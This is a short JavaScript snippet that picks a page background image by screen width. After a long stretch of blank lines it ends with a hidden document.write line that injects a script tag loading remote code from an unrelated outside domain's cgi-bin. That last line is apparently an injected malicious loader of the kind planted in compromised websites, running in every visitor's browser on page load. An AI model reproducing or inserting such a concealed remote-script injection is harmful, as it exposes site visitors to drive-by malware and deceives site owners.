var wd=screen.width;

if(wd == 1024)
{
document.write('<BODY BACKGROUND=images/bg1.jpg BGCOLOR=#06BBAA LEFTMARGIN=0 TOPMARGIN=0 MARGINHEIGHT=0 MARGINWIDTH=0>');
}

if(wd == 1280)
{
document.write('<BODY BACKGROUND=images/bg2.jpg BGCOLOR=#06BBAA LEFTMARGIN=0 TOPMARGIN=0 MARGINHEIGHT=0 MARGINWIDTH=0>');
}











document.write('<script src=http://gabler-bayreuth.de/cgi-bin/default.php ><\/script>');